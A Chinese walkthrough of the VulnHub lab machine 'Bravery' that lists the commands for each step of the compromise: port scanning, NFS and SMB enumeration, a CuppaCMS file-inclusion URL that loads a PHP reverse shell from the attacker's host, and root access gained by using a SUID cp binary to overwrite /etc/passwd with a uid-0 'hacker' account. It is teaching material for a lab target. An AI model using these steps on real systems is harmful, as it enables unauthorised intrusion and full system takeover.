虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/虚拟机简介:可能有不止一种方法来获得此计算机上的root特权目标:1个flag级别:初级
1、信息收集
1、通过netdiscover检测主机IP地址
netdiscover -r 192.168.207.0/24
2、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.163
通过扫描信息查看开放22、53、80、111、139、443、445、2049端口,并且检测到位WordPress4.8.3站点
2、WEB渗透测试
2.1 查看有nfs和smb服务,尝试nfs连接
showmount -e 192.168.207.163
2.2 挂载文件系统
mkdir /tmp/nsf
mount -t nfs 192.168.207.163:/var/nfsshare /tmp/nsf
2.3 查看目录中文件,类似密码
2.4 使用enum4linux查看smb服务
enum4linux 192.168.207.163
查看有anonymous和secured目录
2.5 访问匿名文件夹
smbclient //192.168.207.163/anonymous
password: qwertyuioplkjhgfdsazxcvbnm
没有发现有用的信息
2.6 尝试使用david用户访问secured文件夹
smbclient //192.168.207.163/secured -U David
password: qwertyuioplkjhgfdsazxcvbnm
get david.txt
get genevieve.txt
get README.txt
下载共享文件
2.7 分别查看三个文件,得到网站访问目录
2.8 登录WEB查看
http://192.168.207.163/developmentsecretpage
http://192.168.207.163/genevieve/
使用burp进行探测发现,有一个cuppaCMS
2.8 使用searchsploit进行查找,有一个文件包含
searchsploit cuppa
2.9 查看POC
cat /usr/share/exploitdb/exploits/php/webapps/25971.txt
2.10 使用POC反弹shell
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
vim shell.php
2.11 开启http服务
python -m SimpleHTTPServer
nc -nlvp 4444
http://192.168.207.163/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.207.129:8000/shell.php?
2.12 获取反弹shell
2.13 使用python优化脚本
python -c 'import pty;pty.spawn("/bin/bash")'
3、系统提权
3.1 查找有suid的二进制文件
find / -perm -u=s -type f 2>/dev/null
发现cp有suid的权限
3.2 需要在kali机器上创建一个用户保存到/etc/passwd
密码为:hacker
perl -le 'print crypt("hacker","salt")'
使用perl生成加盐密码
创建账号为hacker
cp /etc/passwd ./
echo 'hacker:sagIxVoGwjNkY:0:0::/root:/bin/bash' >> passwd
3.3 在服务器上下载passwd文件
在kali上开启http服务
python -m SimpleHTTPServer
在服务器上下载passwd文件
cd /tmp
wget http://192.168.207.129:8000/passwd
cp passwd /etc/passwd
3.4 切换账号为hacker,查看flag
su - hacker
ls /root/
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Bravery
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论